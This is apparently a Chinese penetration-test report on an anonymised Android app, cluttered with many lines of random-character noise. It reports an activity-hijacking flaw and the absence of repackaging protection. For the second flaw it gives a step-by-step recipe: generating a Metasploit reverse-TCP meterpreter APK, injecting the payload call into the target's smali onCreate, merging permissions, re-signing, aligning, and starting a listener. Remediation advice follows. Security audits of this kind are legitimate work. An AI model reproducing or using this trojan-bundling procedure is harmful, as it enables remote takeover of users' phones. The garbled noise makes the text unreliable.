1 @9 R7 J6 ~7 p" F5 b/ w# X0 ?" C! x4 a) q% t7 F& ]" K, B8 d
表1-2 测试结果
4 |% i9 `( {) J) X G& C5 ]' h; |" M
/ L1 N$ c# K# T: V+ a: |* ]0 m" K0 {1 ?) ]8 k, M
- o; I6 A! a9 {' x1 x
+ v- @8 |9 f K5 k . ^7 I$ _; v- X$ U6 J: y
8 L! E6 p2 E4 A0 E. P9 t' v' E
" @' w, L8 Z6 ^4 X$ I
0 O. x' |( t2 h1 O& S
2 s5 m( z# X! y- ]! L! m X0 d
. E6 c* c( ^% k6 [" x6 {, R 2 检测结果
5 r8 V! }% p4 K' O7 z ~; A; Z2 T0 N+ K4 Q+ ?
! q- z! i( ?% Y( y
& X- ?7 n. d7 V) Q9 K& @; b
1 A4 M+ _' g- G$ E
# `+ d" I0 z( m7 z0 `2 m 2.1 某某某 + \% i' C, n X# e
: E( u' K$ t \: E
. g+ V6 g1 `0 k4 u1 ^2 q- r
& c& J8 }0 y8 k) p, h3 b* S; k' a' q# } " e! e; _8 y, N" n2 T7 N6 N7 b# S
3 Y- A* x2 Z4 Z X5 [1 U/ `& v5 N 2.1.1检测目标 ) b/ G1 ?" a3 x' G9 F6 `% Z) s
2 p. s; X! p: o+ v0 ^5 N* i* ?# `
. Y0 {& t& ?1 F. }
' [; p# s% S* y . l6 q- t& w' ?; z( R" M
: j& y' Y$ C$ Z 目标地址: 某某某某某某APP 9 D0 Z4 V$ w$ x! R: D$ Y$ V
* w' @; h+ o& @3 U2 K
5 Z+ U) y8 {# T0 z3 x0 ?: k; x
" i2 U Y. R; _ ! Q: \0 S' S0 m% M+ X
( u* m! C0 M d" {& W4 A/ R 2.1.2检测结果 : [& m& B4 G. j" u* Y/ ]: y& z
& \- y1 A- L3 q/ K0 \+ v
: s) Q' u% O5 m& A% ? w K9 H6 N+ Q G0 A. v% m$ ~$ H
6 _4 P# j3 P* W+ X* w
/ [2 j3 s; J! T2 x* H, |0 B$ w
2.1.2.1 7 U7 e* B8 g. j1 i$ p6 e
5 k$ q0 {# z- z9 q/ ~/ y
. g0 P2 x% k" z: t, u- |' {) h. K
1 E9 u2 a1 J5 | # r7 t3 @9 I5 b' f+ O x
7 Z4 g6 d1 M7 M9 r9 E+ w 漏洞链接地址:某某某某某某APP / c* f- X, B* Y( k, }, ^6 y
/ A% F, P- @! f% }# _; X4 J
4 p7 Y. f* U/ p6 H8 L' B) A
* f5 {, x* ?0 g5 e( ?2 L% V) d! p / \# Q7 \* g+ e
+ ` M* g4 q7 B
; ~8 Z2 h( b) w" s" c. H' U6 U
f e" \) e- R# i8 O4 e# h
* K6 b7 z6 J& y1 y) i
5 Q; N" Z/ I* O 0 o6 ~- F! ~$ j1 J$ G4 l
8 P( D# N2 [# j5 p) `
漏洞分析及取证:
" \$ z5 n: u$ i3 i- W% }. p6 S, x0 M3 ^/ d% O4 Q$ ^
4 b- N+ V8 c2 y
( q8 r7 z4 t: G / _ t. j, Q: i6 q
& q2 {* _ ]9 l# x 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
% ^$ ~' k( A4 @. f0 T8 \
* d. f# a( C4 A( J, f+ `
# q4 c# c+ f) s; J
* e1 O0 D; a" L0 L+ O+ ^ ! B) C% @9 f5 y2 U, V$ P
( G. S% v: E. t/ y
1 T( W2 B2 q. e) L
, Z/ ~8 p8 H; o N2 p8 E9 }
3 H/ a) j8 ]. D. ?9 X2 j$ p( t) S; d5 M! y
% f% i/ z. ?# D8 h) O6 L0 b" q
* \0 j5 S8 y8 q& @3 A
% K# j' [9 ?; V: D4 ^& U' f9 B$ O6 _9 G( u
+ m2 L8 m0 [+ T) P
& A0 M- \. X) R" u. n
/ W& D0 z7 X; i3 y' W. Q8 c! P6 ~& h8 }
' V% G: ?6 [5 v$ g: I9 m$ H
/ l. h7 a9 d! }
6 S B8 y1 Z1 [ z
* o9 M7 \- d) Y9 a6 R# O$ z
, ]5 q: G9 }) S5 ]4 G" f
4 e, L) e# V" `
9 m3 |7 ? |4 C; a- s8 h/ z
* {6 o- y# Y9 H1 N+ u& ?
9 V" n2 Q M, Q8 k% L+ G6 b. `2 {! l4 }4 @ ~
) X S6 j4 g, A7 k7 Z1 U
+ n. F1 ^+ J$ K$ g; b" h
! `% ]' Q0 Y1 j- T
a0 P& d3 r% o- ^ b0 P
( T7 Q7 ~7 D/ O; ~
, X9 [5 `( D. N }
% s9 r( }2 _8 E- ?7 I) {1 s
/ x' E1 o# X: z: Y$ c
漏洞危害:高
. s, A& N8 c9 e; ~" L C H! l3 j" Q9 D9 t7 @) f
\& Z6 }& i- S9 p+ c1 E6 N
: Y9 l5 ?! @: F1 K4 v& y
1 _! f1 q1 P' s' t9 A4 _
$ t& z+ C& b2 {1 ^- p, x5 O
/ z/ X c) c7 o$ N; {
- I( f5 b! ?9 U/ S1 h* X( r! Y& r
) r& h2 y9 r7 D9 Y; K+ w% N7 B+ B! S7 k8 M
" S5 d4 o# }' w7 x3 @$ \
0 |4 X, ^& ^ s8 j+ T | / L% W* D' B( l1 W4 ?
+ o' h9 \9 \# K1 |
3 |! V- E) l9 ~
- Q; Q9 {7 q3 Z& c5 `. x! l 严重程度 0 Q4 c1 F: @: m5 @% H7 p
8 V3 s; h$ L8 m+ V6 n
2 s- G* N9 n. c8 D/ K" B" o* f4 X
' C. \8 b# Y8 Y, E
|
8 j: J2 h: _' `; u8 G, v9 V/ j U2 J3 A1 B3 N
1 @9 O4 n3 O: C( |- t7 I
9 N; k9 }6 D0 `! \* p% t( ^& G- ~
$ U1 D! q3 s, a7 v' V5 Q S9 e0 p5 |' }8 ^4 q1 e" O
高 # u* W. [7 w9 Y$ f
* R1 R! H. m _* O5 q% @ 9 N* |6 G4 A n) K A( \4 H" x! S6 e
% h1 h, ]$ E) E9 O/ s | 2 ~3 }# M, B3 Q$ m2 Y
( d! ~ `0 q' ~5 |
5 x, I9 d$ N! O: U; n3 r* ~4 T1 B& D+ O
+ _; l3 q+ N1 D3 h, W. o |/ c2 e. [: \
6 I* p0 t) x3 M z4 f1 f0 m ■
/ x1 d/ o8 O: \) h0 R) R
) _7 x7 @/ f+ u j; S: }$ Y: B; `- X+ s+ u- a6 m
|! Z; j# i4 ?2 x3 t
|
8 P$ r1 A9 r; V, M9 \ _6 `4 I; a1 T7 v7 _9 A/ Y
( }6 A* B/ A8 B+ o6 e8 V9 e8 ?
" ^% t: M! o$ ]6 d) d0 q
. d- Y, m, {; a! i+ q( z* J
4 e5 A. T* R& A$ k& }2 _# x 中 % q3 H U: c9 O, _7 R. @
& W. n( l+ e0 G
6 u( |- s/ ^# V1 n8 E1 N* ]$ i$ V- \) s) p( F% f1 ^8 z; F* s' q z
|
2 J' O. B4 Y/ g* ^6 A1 p! e
" w/ ]. ?" P% i6 H; x; E x- E' o) ~' b# K2 ^# L! }5 E% R4 R
$ Y& G0 m" L2 Z" e
3 ~7 U" t8 m2 E; ?# C+ O' V% Z a. B2 }0 r ]
5 l9 @3 i3 ]4 Y% t0 h
+ y9 h' p7 p. d |6 h! s2 J) R
/ \1 S3 e2 V( w5 ~
0 g7 u" l, E/ D |
4 |; @8 l) c# \8 o* h
: U0 N) k# T4 j
& w6 B- U4 o4 B- g1 ^9 P& n; X1 e9 _6 y9 z [, Z
& U3 z% }: n2 L" r/ z$ l9 T
: Y+ m" C/ `- A7 J% r5 F
低
& H, m4 r/ L9 E9 j4 P( C9 p! w2 ?+ E9 ^* U2 y# ~
6 x, h$ \* r5 f/ z/ `: D
( {$ b5 C6 U" x$ H
| 8 z, P/ q9 w* N4 |- [) I/ {
/ |) f- w* g, ~: H ! f3 u$ h' Z# x+ V9 T' y; O1 W! V
3 k# A9 b* U i9 g8 _5 F' i: m/ _
5 Q1 Z+ `8 {; B7 f' G Q/ L0 q) _
0 U; }! O7 G" p& n4 @8 U5 y
' e! U4 ?0 F2 z' y, ]1 ^ n+ ^
# l1 @" k! M9 V4 F( J/ E
- J2 s, R; E0 ^3 A8 L0 O# f3 a
" N# e5 u' S* K/ x' |
| 2 g1 _( c6 O& p2 ]
* t: j8 M2 {& _; x/ Z5 p' i
3 F% n& H3 e }7 p3 F- d
) }0 g) w# ], d
$ G1 E7 G1 D ^$ |# n3 k$ z
# |+ y" {( K4 F7 M
9 p4 y% e1 @8 ]0 e8 `( ~
, ~% v8 a% q0 S3 j
. s% v# L+ q( {, w/ a V8 x
" p+ C* O) Z, w' C% h
- R3 n" ~8 T. [# a
S" Y1 r1 }1 t ! ]7 ^( r0 V. `. u2 d
6 k% f6 G) f8 O
/ F9 H6 z" L/ k+ n( v9 K8 p6 w2 [) ~: j1 E# g
- A4 q" C) Q8 ~/ Q; v8 A' V
r" ]% N# u! D/ d# F
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。
' }& b% ]5 B2 ]2 k _( _7 Y3 ?8 y. j' S1 C$ B8 o7 ^; z. j
5 Q5 c* ^$ Y( z* b4 c& R& ?, ]$ Q4 h5 y( O: t! Y
+ D) X6 c7 I4 ^1 K& \, C
- |7 x& K+ n9 k% A! x
5 H- G( t% K. O7 i) ^5 b
8 @5 M" m4 v% w) Q, i
# k- t& Z' c9 f" J3 N5 e
. w! z& [1 M \ " d4 u; F& s, K8 i
; E* B6 y8 l, f7 g" F $ L+ ?2 B( G' f7 f
4 U' s% e* A# z* d' r$ \
5 g. L' T2 ]; ]
4 ~# r) c- ]8 ?5 W2 ~! l* N; z8 L
" {. F4 C. K5 `/ K% }, ?8 \( ^6 T2 t
6 m7 i7 s* l' h# z 2.1.2.2
' W" S; j: b. w6 D) F: y7 q5 L' ^( x/ y
& p/ v6 f$ T' ?0 G7 i7 n6 W3 Q! L, A
; R4 G. ~0 `! R" ~
( o! C/ f# @# u' O% R 漏洞链接地址:某某某某某某APP
! h% U1 f3 O) B E
* l' T2 T( z1 P
* ?7 Q& l1 W+ F+ r3 |" ~5 y% I* P
% D' Z# _" I0 A& x: q 8 X% e- O/ {. |
+ |* s8 e+ q, M& V 漏洞分析及取证:
* v) p+ H# b& E+ s* t, m. y! z. K& |8 R& {& m
) d8 h4 s. T8 e9 L: M
8 o$ P- L: y( w6 Y# c" L# G* O1 k
$ k: o4 i9 \5 h& f/ l( S
1 u! ]4 M" S2 d* t% ] 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
7 a% L+ f3 d( K% [2 h* O8 `) D# S6 X7 M# B7 _% H7 L5 N2 S4 r
* L" h0 R4 |& v4 m
# m( @( \, f+ e1 c! l8 x
. X( [. w2 W- M% i4 j
/ o# H/ e( ^: U+ s; ]: C 用Metasploit 生成木马 apk
& l/ M9 ]1 P2 e
9 R. _" v' H( Z
, A& E6 h- {: q {# y
2 B( ~6 f) I- X P- @! f% C
6 H2 s# F4 \; |6 A
6 c% n% v# V- d) Y
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk % J& @/ g# S3 ]$ b7 U; H
# F# W) B/ A1 B, m" X
2 q5 z4 E' [( r6 e
. C5 D# d% _. b, L
7 d z) B+ @8 a* ^; j! |# y4 p+ t+ p9 |
反编译目标apk和木马apk
3 s" {1 I* m" J2 S
0 } ~; |1 u6 l3 r3 D" k
: \; u4 f0 J3 x6 n1 \: ~& D( n* |8 @( r& |# K
' H. \# H2 [3 C; k" q8 |
7 S5 [( ~& k/ D( ~7 J u apktool d target.apk
6 h9 u" \' W4 m. c3 j
1 ? u7 P! I) P1 {# W apktool d cockhorse.apk # w1 s3 k2 g: f, x
9 b# G: m0 |; ?( q6 t
6 i, V# D) z$ `% M9 }
1 r& M- h& W3 V
3 o% `- y4 b6 d
/ y( Q* I6 x+ Y 木马 apk 注入目标 apk / U0 T9 r6 n8 J
' Z( G0 h0 n; b2 Y$ e" N/ O
2 `+ C( ~$ {% T$ ?/ S" q+ d
& P0 m& X* `/ u
3 m+ X8 ] A8 K9 h
, |5 p4 W) g; Y, Y: P O 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
1 d) o9 m' N6 ~2 x4 _
$ G% v" R; d' B( e! b% W: W; r invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
/ @9 b& B0 R5 c' a+ e U4 Y+ R+ v
) a$ S' M& _# A; ]2 [% O) y ]! I# _/ U1 x$ c
8 c7 P4 b' Z$ F+ w, N! A! X) ^
8 ?6 h/ \4 _3 {1 S1 _7 N* v 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 8 N$ o. L. {2 n: J( J
/ d1 J; d; e* h1 K$ r1 n
$ O, s. l3 ]2 k* a. }4 r
0 o* Y; n g) U' C
+ T6 p+ g" Y. B5 i+ Z7 z4 H/ \1 ^) C7 Y2 @1 K( }
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
& R7 R1 S4 K* c0 n2 f
" L$ x6 c) i0 _4 X# y0 ?- S0 H" e2 O
5 a5 [7 z; @; ]5 V2 Q$ ]
9 ~8 w% L6 S# U& E; c; d
/ w( f' {: R9 t4 O3 Z$ P. Z2 p$ K: r0 I0 [6 H
回编译生成最终 apk ! S, h: u% i" e- Y& ~4 n
3 C( Z, `& i) I" K6 D" M% h
7 G" ^, t9 V+ U) M1 b2 J# x0 h4 q5 C( v5 k# T; W
R! |# d1 _% e! V
7 e0 A, w$ H: p) B 重新打包
% O4 P6 Z' {6 T k- O- b f" e( A) f; t$ Q2 I* i* D
- a* G) u5 A/ d2 H- o/ [$ S- P0 l( H) M+ W! F; I
; T; U8 f4 _' I8 k
0 f6 q' A* U# I' K- x2 C2 a4 p
apktool b -o repackage.apk target_app_floder * ^( X8 \" t4 |; ?* U3 x) B7 Z* Y0 ]8 C H
; \, U* x( P/ |/ M3 U/ Z
c3 k2 Y, ~& g2 [4 Y; g
' t( p2 _: V2 i/ A+ ? 0 s& h5 W; g& B6 C8 A
2 z6 i9 x- \( M* ]- K" {2 y
创建签名文件,有的话可忽略此步骤
+ n& w7 F* ^' J/ W( t$ D2 _1 R$ x
0 u8 B" D r* c- Z3 V+ |
3 T' j# z) a- b) m& ]
: n8 _) G$ Z6 p+ a+ g1 k 7 K/ T2 @. N m5 E' J, t4 O6 k
+ z$ S* F5 N( }, M9 }
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 5 O/ K/ _5 W% h, V9 r3 U
& g* G% ~* |3 H C# x. F/ f
) [0 _' i7 H: H1 G
( `9 C/ A& j) {; o& }( m, X
" _+ W/ n3 O) {* _, t9 I7 j `& b
6 P ~- \) n% h. T$ Y 签名,以下任选其一
9 h/ c" L7 b3 }! z. J% \& X% M% ~& M
% ]% A$ S q' L& w) b6 q. k% t
# w& c* T; E* m1 B# @' q9 H* C7 {7 b3 B
8 m7 C$ O' g9 G) U# j
- s S$ \6 P# M8 D2 K
jarsigner 方式 ! Y+ _% c- \0 z5 }1 }2 N8 {; l
& p9 L! N( L9 d9 I
K% B% d& k c2 t
/ c; K1 z1 M3 F! v" C% g
7 T4 e5 p# S N0 T) N
; c% b8 b6 K( R2 d( {7 i( W jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
+ I& S. I2 a, J. A: v, Z, S4 c: \. R7 G, l# P; v
* v2 h+ o. {9 q
$ [' M0 ? X: W
& _' x ` u6 w5 [' [ \1 l" o8 t9 ?* V) \/ Z$ C
apksigner 方式
+ P# k9 W7 d+ t4 |( ]( B J' l J/ _2 F
2 W( G: X/ ~- f. z
, k! d( f+ t+ O/ N
" H `. [. L# H: T. l* }
8 }# Z: l. u: N0 z3 {; `1 q apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk $ V8 J: f0 ]' u4 d5 o7 S
$ Z2 `) o. N' E
1 E& h# P ?' y3 K5 a
0 B+ g6 F7 s/ T0 |: }
; N+ y, L/ D: k4 |* g; ?
/ d* s5 @& ~) R9 k, F7 Q1 }7 h% ? 如需要禁用 v2签名 添加选项--v2-signing-enabled false
6 x! X7 @. ~5 {
' @2 D6 a/ N: `, N2 k! b0 |* |6 U
+ \1 C/ Z2 b% h m; {9 F
7 I9 y4 A& I+ ^& o& o; o 0 p2 ]' n! q9 E$ k" T7 H7 |
+ W8 b2 n) f6 T% h 验证,以下任选其一 ' c. h- _( s. _
; K$ R5 `4 S( G( Y" l; I
- n% _5 k3 N' F. a D9 X9 ?
0 K2 V; T* ~# R( \8 s; L , }& I5 H% e8 e7 i, T
( i) h6 S0 G9 l jarsigner方式
0 E/ f9 G* D8 l* @* t
$ d4 A* [* M& W" l* h) v' W
- {5 i! V6 e% ?7 X a2 }
% Z, y& Z* n$ ~; `
, f3 I7 t- P1 t+ P. P
. \5 O* l2 U: f jarsigner -verify repackaged.apk
7 t4 P% P* N) n6 a- M& q3 e# v u: U. {6 M2 {* M
) R# @3 Y, _& Q
+ ?; Y+ w4 g% S7 c+ U7 |9 x
2 \' W2 l! {7 A, n# r9 J) J0 X
+ Y% l5 c# u% O apksigner 方式
- ^3 A }4 G' s2 O1 K9 ?. H0 _6 k! ^+ a! x M0 P0 e$ o: ~5 y7 L0 I
- u1 l- g/ I! Z7 y4 z
, F# b; I" x7 g7 s1 R' A6 |
% T2 E! Z0 v( t' ~) @9 N9 F3 d% R$ @. j5 c9 l" `, H
apksigner verify -v --print-certs repackaged.apk 1 p: x1 \3 R c( ?, L; T% O
$ w3 L+ p4 |7 l# ^( Y
; Y" ?. S+ E7 z9 M& L; h/ g; Q7 R9 {+ I
1 g- F2 M# g' t5 `
" e2 ], `) y; ~+ Z$ o keytool方式
$ E7 k" ?. r4 b! A- p" a% S' {+ n' G2 K7 ~/ g
$ {2 R+ x7 P- h C2 }0 d) h& ~) u: X1 s0 [% c5 z
, m- l' f# _" u4 ]) G/ v \" S
- ^0 ?/ _3 F: \- a+ H keytool -printcert -jarfile repackaged.apk 2 ^: b1 T( U$ \: H1 I' U4 u6 t
: i4 N3 Y7 W( V9 D
, ]" k2 H$ U, K o }8 H
4 S" ^* L( I/ y+ ^8 t1 @5 X
$ u" R* E4 @4 @7 \ z+ J: V) R! k
" Q) M2 m" P! U7 q6 E+ Q3 p 对齐 + T7 f9 K" J! N
3 B/ `( j I+ S3 e: k) C! E A
2 m' _% D" Q& p) I$ y1 I* ]
}$ U" D& h A4 E9 t; t9 `+ j
. G- Y; O" }! P% b% u7 H6 H) {2 B( k C' y/ M7 R( O
字节对齐优化
$ `7 O5 m4 S' H9 ^/ o
2 J2 {% f, @% O5 T: k/ K2 q
4 Y, j& |- i o I4 X
* p5 A- ]# c5 [# p& Q8 O3 ?4 n
2 a* f E. q9 z5 L8 G$ q! p3 {
% s# ~7 Q2 S; X7 S0 i5 g6 \ zipalign -v 4 repackaged.apk final.apk & a, r7 C7 f# Y
* V" Y5 v9 o: E* D
2 h9 g" f! K5 z- k4 u! O
) @7 v- R) h1 a% z9 v3 p* f0 x4 X- n . Y" ]1 B8 N" S& F7 D1 o1 i( n
- P' U6 X: O- x
检查是否对齐
" t( o5 ^% s! B$ h, f% q- x7 m' E& J2 ]- d
( K6 p$ [8 K( G4 m6 {5 t. A3 s
: R W: I7 d$ c0 }' H* h
4 J$ ?# o/ X' M" R9 A
2 o* M. G7 ?" X zipalign -c -v 4 final.apk
) S: N2 |3 r( E6 @- w" g& x: y, L. x
' B' Q+ j7 m! O
. \6 { e* A8 {2 T9 s5 [) I
; D/ c9 f% j$ `) Y$ o2 |$ y9 S: s; B6 W3 a- e! X* a# }
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 $ H e6 C9 j1 N- z" f o8 b
8 L$ T, S0 j/ i* E8 b
& `% B+ G! S) K7 |& I M5 K: n
5 [# w% g5 Z$ s# b
) P% F& E1 V* K! @( L5 C' Q% D% S/ e- f8 {: }) W( G1 [' a
启动Metasploit控制台,配置参数等待上线 , ~8 m+ f9 l# W) j' |6 c
5 I' f: j' r' s" L" F! x p
; x4 x& K2 L4 O" K) N5 h* c0 f
5 V+ r' s: A" t8 T 9 r1 x! m0 Y; d
+ R$ M( H- }! a1 R6 C3 w
在终端依次输入如下命令
; G# T6 Q( T* c# C; G. ` }3 j q" S; o% e1 p
& y5 I$ W; L. x! l: `# L
# n K! q# `3 j: ]4 v1 b- u: A
8 E( {. T5 J% r$ u3 M+ G# B* H: `! z8 A( A N
msfconsole
) J0 O8 f4 f* k# X* ^* `: I2 {) I8 t- ^
- T4 \; M& c7 {) E% i' a% K( i. E; \; V2 H* l# u' ~4 V/ S
% O4 Z1 S, l3 ^. l; i* L* ~) }
+ l, c# e2 u% U: c use exploit/multi/handler . k; C$ J" b' W( {
3 ]& |+ w# i+ H5 d. `
& ?' E7 M! R4 h! P- [/ H3 K! O1 m
# [ V- r b) }1 ?+ R' e
. Y7 k5 m8 Z5 H5 a set PAYLOAD android/meterpreter/reverse_tcp - c2 p: S; S- z2 ]2 |
$ V _ m( s/ G, T
% Z3 @+ G( l+ @& o2 h) u
" U! q# J* N% D8 ?- t 8 @* J. m4 a2 [; Q' _. a
2 b9 W+ S, n2 v0 U3 o5 e
set LHOST 192.xxx.xx.xx
7 `8 G9 C( h* E
O3 ~+ B* N4 ~0 C* Z- t0 g; r' ?
# T& ~) i+ X4 I, \9 W" J0 M! a7 @ @( W6 H
+ o1 R4 ]3 {: j B4 C1 X# I) w. ]4 w* j( S
set LPORT 4444 9 Q: M' K8 r, I) w: }: v
" C4 a6 f: q1 X
# k( ?# z5 w9 H" Z+ r
1 V0 x; C4 k) x! V, l( d 9 m# ~9 `8 K; @5 T0 @/ g
) ~$ y: F/ k+ a exploit 9 \4 t9 P+ t" H0 p9 A- b7 ^
. Q f7 r" H1 i8 j J |2 ]
" t a8 E! y5 T8 e
! x7 o: P( L6 d. @ - m' a8 b7 W% L! ^' Y. D
6 R+ U! p; k" Z% j, k" J5 v" a. O/ S 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
2 K4 t3 Z% K% S5 Y I' r# R
( \& T# R9 [$ G6 |, [$ f1 l5 L
) S6 ], Y5 Z/ o8 M# E) R( a
- g) h, H# Q3 j5 Z* h/ u( _: E: m# I
6 a1 B1 X* \: e; h+ @$ ]6 d( G- H% h1 N0 X/ \% a+ z, o$ e
漏洞危害:中 ( g' o9 t% `3 E8 i: U
) ]; v; Z! G" Q, H5 I) m
- b5 B4 X7 [- J
8 i. d: K: [" @% `
, Y" @; D0 F+ [% i4 w" A1 B0 Q5 j Y/ e g
/ |: f( \! Z W: u( E1 P i
- M: l7 u9 S& ?0 M/ B7 ` * n c2 P, x; X X
7 f s2 E8 M0 L0 K3 n0 y# V
' y9 l0 W* ~# m6 P4 f
* V: y! Z' T$ Y; ]! H h" k5 e / |7 R2 o% R& n% {' z/ M) Y
1 n" }- Y& d" j! s |
' b. k4 x/ s1 l) k8 j7 G1 Y
! T( N2 g+ I; d6 N
0 K9 l& I; E0 L1 f S
4 d, B9 j. Z1 M) M 严重程度
# n3 B' D9 ^( \4 m# Z
* y9 T! w/ v5 ~) e 4 h4 b* `8 S) Q1 h. Z* A3 o
6 x8 ?6 @; ?1 k! g
| 1 |/ j) N$ B+ H) ?2 m# T! K
) }6 c' j- J) q) H
" Y9 o- r; R5 h4 O
$ N, f+ h/ A* d" t+ e { + o1 h3 }1 L6 A* z: O
% x. J* \5 Y# x 高
2 s/ y1 {9 L) w
/ X9 o2 ]) {! @- V8 ?5 e
. f6 l: A4 K1 G6 Z) p( v9 I4 q, S8 M2 z: {6 g) B
|
. T: ~/ |7 n) O% ^8 G d
# A2 [( f% [0 J& Q; S
+ H3 z2 T0 c/ Q( s' V& p3 Y w5 ?! L" k: N! H+ R
& |+ M9 j/ U2 D5 }+ t" a5 b* ?
% K4 b: f2 l- W( f
■
5 k% P) K/ I2 `! G* w- V9 c0 I, e1 |5 o8 N! @; ]
* C; s, A7 O' p2 ^8 }: G+ b
J; U9 c# H# E
| ; q6 w0 O% o1 g( ]+ Q
1 Q& t7 ^6 U6 a* Q9 v# L+ N
5 g4 G" z+ _! s: D8 j; g
( I; n. `7 t& P7 t
8 d# _+ M" R* T, y; C0 G" m1 X. B0 m! g8 d G/ l, Z8 I0 x4 Z
中
" R; A/ k% S9 i) T0 h, n& ^8 A3 `
2 @! V+ ?( U5 Y
0 I& I& s% R/ z" t: @5 V* S' b
. \0 @/ c# c1 Y% u+ ^ |
, E/ j- X$ R; C; {% I( q1 R. U, j$ P' s5 t* D$ y8 y
; ?0 ]- p# N) l- @
3 L, f: P& h7 O, u( w1 L+ k
) f3 U Y4 ~, G6 D4 G/ C) C; Q9 M& ~- O$ w% j- M/ _# F) t$ r S
) A4 G) {2 e$ z- q7 y1 t. E
1 ` V- h/ X' w6 r' l B
4 G6 `; H+ ~8 n U, \6 _1 c
) }/ k7 I! p2 S& C; q) }
, Y, L/ K, C% Y* u$ z: A( \
; a/ \0 G* I8 B
| + X4 |- u9 f. g& s) c
% ]2 m9 z6 ?( {/ p5 ?6 E& c3 I
; r2 T/ E. w* W( M
$ \8 J" L2 P( S* A
$ E2 l3 e2 N7 i& M7 J$ u% w* R! U
5 N- d1 Y9 t2 H% h( r+ i 低
# O7 `; C- \4 c3 `7 ?9 R* Z0 n# [8 c! S9 w9 L8 ~
8 M/ }$ a$ v; a6 S' n+ o6 E) r- o$ |7 e2 H$ e. r/ `% d2 ]# j
| ' ~+ z/ m" I% s- j' `+ N, M
5 L: O/ v1 e x6 N1 y$ _
y" I* h" a7 j- L' k0 U" ?( r0 g5 W) i2 S
( j/ c8 S* ?* e0 ]- {9 n
. }3 @% q, c- R* n
4 M7 o2 G- o; B
' n9 q2 G. H8 [; @ \ H# G. r# A0 W9 b
) W+ r* y) g7 p7 ~% R7 r
% e) G1 b0 x$ N$ c4 G0 k8 h6 I+ l+ ^/ ^0 w
| 5 {; b% Z. U8 H2 M
- ?% a/ G2 l, y+ v
& y- b* t1 P% X5 W8 v4 B" e
3 V% p- }3 v. x& H
/ \5 A, v0 u7 Z: r# d1 {$ L
3 _- G1 c0 h6 ]8 K; W
5 y, y/ F& G$ G6 |+ q( ^; t% J/ m
% a8 T4 w% s+ x- U1 {4 ^* q' B5 O. `
5 ]: V6 I. ]( W- }5 b
+ x( a3 w: U2 I* s
6 N! P: b! {: t& b/ h* m4 f
1 f" _7 L8 B2 B+ @0 O: Y
5 ?) S5 M5 h7 ?/ a
# K$ Y G5 n+ d# ?% q ( a6 f" o; f8 Q- |1 Z. K/ j
" s, i9 ]1 }) w" [# s; Z2 ?8 o& b
修复方法: / S8 D5 [* C: O3 S- S
, ?4 g/ k& y. q/ y" M# r
) x1 }' ]+ [/ e
# {0 B/ e D. s0 e% w* F
5 [6 ~* U8 u3 o+ y. u2 C) H+ t( \3 b7 ?' `. D- F
1.在 APP 启动时应做签名校验防止二次打包。
9 E- T. j; L2 p3 R" B6 n$ F) L
: l5 D0 Z4 z0 c# ^& \# i9 T 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ! Q. t* N: |9 t
+ A- |/ T1 F* B
' ~: e1 K9 ^2 q; B: a5 X: d# G: C
1 @) |/ G" Q2 p# g
- x2 e$ r# G: _: A- o" l
+ p6 H7 d- L4 ^# M- j5 C3 G$ Y
5 O+ ]: H1 ^" w( K3 t
( a8 G2 ~2 J/ @. r8 Q* Q! Y
. c) J% I5 g" L$ L
8 \- z3 w) b. S; ?
4 f7 L; j, c8 d: b1 k- M; G1 {4 z& q' [1 c+ P$ H3 L
3 \0 O1 O: H i. n- b3 L7 d6 Z7 t7 O0 w
' M2 B3 n# h, Q- A0 j
# y+ {- @# P1 }1 S7 i: x3 G: \5 s
; w0 Q [. J G- |# G9 o; v- T a$ b0 X9 z9 a: f% @9 V
/ y9 w( h% x/ _' \/ \
5 v4 e5 f7 d- [; Q1 ?